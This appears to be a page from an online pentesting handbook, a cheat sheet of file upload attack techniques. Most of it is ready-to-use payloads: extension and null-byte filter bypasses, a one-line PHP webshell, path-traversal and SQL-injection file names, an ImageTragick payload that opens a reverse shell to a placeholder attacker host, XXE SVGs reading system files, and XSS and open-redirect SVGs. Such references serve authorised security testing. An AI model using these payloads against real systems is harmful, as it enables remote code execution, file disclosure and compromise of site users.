Pentest Book
Search…
File upload
1
# File name validation
2
# extension blacklisted:
3
PHP: .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
4
ASP: .asp, .aspx, .cer, .asa
5
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
6
Coldfusion: .cfm, .cfml, .cfc, .dbm
7
Using random capitalization: .pHp, .pHP5, .PhAr
8
pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,phar,pgif,inc
9
# extension whitelisted:
10
file.jpg.php
11
file.php.jpg
12
file.php.blah123jpg
13
file.php%00.jpg
14
file.php\x00.jpg
15
file.php%00
16
file.php%20
17
file.php%0d%0a.jpg
18
file.php.....
19
file.php/
20
file.php.\
21
file.
22
.html
23
# Content type bypass
24
- Preserve name, but change content-type
25
Content-Type: image/jpeg, image/gif, image/png
26
# Content length:
27
# Small bad code:
28
<?='$_GET[x]'?>
29
30
# Impact by extension
31
asp, aspx, php5, php, php3: webshell, rce
32
svg: stored xss, ssrf, xxe
33
gif: stored xss, ssrf
34
csv: csv injection
35
xml: xxe
36
avi: lfi, ssrf
37
html, js: html injection, xss, open redirect
38
png, jpeg: pixel flood attack dos
39
zip: rce via lfi, dos
40
pdf, pptx: ssrf, blind xxe
41
42
# Path traversal
43
../../etc/passwd/logo.png
44
../../../logo.png
45
46
# SQLi
47
'sleep(10).jpg
48
sleep(10)-- -.jpg
49
50
# Command injection
51
; sleep 10;
52
53
# ImageTragick
54
push graphic-context
55
viewbox 0 0 640 480
56
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
57
pop graphic-context
58
59
# XXE .svg
60
<?xml version="1.0" standalone="yes"?>
61
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
62
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1
63
<text font-size="40" x="0" y="16">&xxe;</text>
64
</svg>
65
66
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
67
<image xlink:href="expect://ls"></image>
68
</svg>
69
70
# XSS svg
71
<svg onload=alert(document.comain)>.svg
72
<?xml version="1.0" standalone="no"?>
73
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
74
File Upload Checklist 3
75
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
76
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
77
<script type="text/javascript">
78
alert("HolyBugx XSS");
79
</script>
80
</svg>
81
82
# Open redirect svg
83
<code>
84
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
85
<svg
86
onload="window.location='https://attacker.com'"
87
xmlns="http://www.w3.org/2000/svg">
88
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
89
</svg>
90
</code>
91
92
# Filter Bypassing Techniques
93
# upload asp file using .cer & .asa extension (IIS — Windows)
94
# Upload .eml file when content-type = text/HTML
95
# Inject null byte shell.php%001.jpg
96
# Check for .svg file upload you can achieve stored XSS using XML payload
97
# put file name ../../logo.png or ../../etc/passwd/logo.png to get directory traversal via upload file
98
# Upload large size file for DoS attack test using the image.
99
# (magic number) upload shell.php change content-type to image/gif and start content with GIF89a; will do the job!
100
# If web app allows for zip upload then rename the file to pwd.jpg bcoz developer handle it via command
101
# upload the file using SQL command 'sleep(10).jpg you may achieve SQL if image directly saves to DB.
102
103
# Advance Bypassing techniques
104
# Imagetragick aka ImageMagick:
105
https://mukarramkhalid.com/imagemagick-imagetragick-exploit/
106
https://github.com/neex/gifoeb
107
108
# Upload file tool
109
https://github.com/almandin/fuxploider
110
python3 fuxploider.py --url https://example.com --not-regex "wrong file type"
Copied!
Last modified 4mo ago
Export as PDF
Copy link